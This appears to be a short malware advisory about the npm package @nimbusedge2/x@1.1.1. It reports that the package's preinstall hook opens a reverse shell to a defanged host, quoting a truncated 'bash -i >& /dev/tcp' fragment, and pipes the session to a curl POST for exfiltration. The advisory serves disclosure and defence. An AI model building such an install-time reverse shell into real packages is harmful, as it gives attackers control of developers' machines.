LWA-2026-12292 MAL-2026-16305 ↗ confirmed malware

@nimbusedge2/x@1.1.1

Malicious code in @nimbusedge2/x (npm)

T1059.004 · Unix ShellT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel

Analysis

The package's preinstall hook opens an interactive reverse shell to 147[.]93[.]157[.]202[.]nip[.]io:8080 (bash -i >& /dev/tcp/...) and pipes the session to a curl POST to hxxp://canarytokens[.]com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact[.]php, giving the remote host interactive access to the installer's machine at install time.

analyzed by
Leitwacht
first seen
Sep 21, 2026, 01:18 AM
analyzed
Sep 21, 2026, 01:18 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.